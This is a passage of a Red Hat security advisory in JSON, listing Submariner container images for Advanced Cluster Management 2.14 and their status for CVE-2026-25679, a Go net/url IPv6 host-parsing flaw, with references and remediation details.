"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "urllib3: urllib3 vulnerable to decompression-bomb safeguard bypass when following HTTP redirects (streaming API)"
},
{
"cve": "CVE-2026-25679",
"cwe": {
"id": "CWE-1286",
"name": "Improper Validation of Syntactic Correctness of Input"
},
"discovery_date": "2026-03-06T22:02:11.567841+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445356"
}
],
"notes": [
{
"category": "description",
"text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/url: Incorrect parsing of IPv6 host literals in net/url",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25679"
},
{
"category": "external",
"summary": "RHBZ#2445356",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"
},
{
"category": "external",
"summary": "https://go.dev/cl/752180",
"url": "https://go.dev/cl/752180"
},
{
"category": "external",
"summary": "https://go.dev/issue/77578",
"url": "https://go.dev/issue/77578"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk",
"url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4601",
"url": "https://pkg.go.dev/vuln/GO-2026-4601"
}
],
"release_date": "2026-03-06T21:28:14.211000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
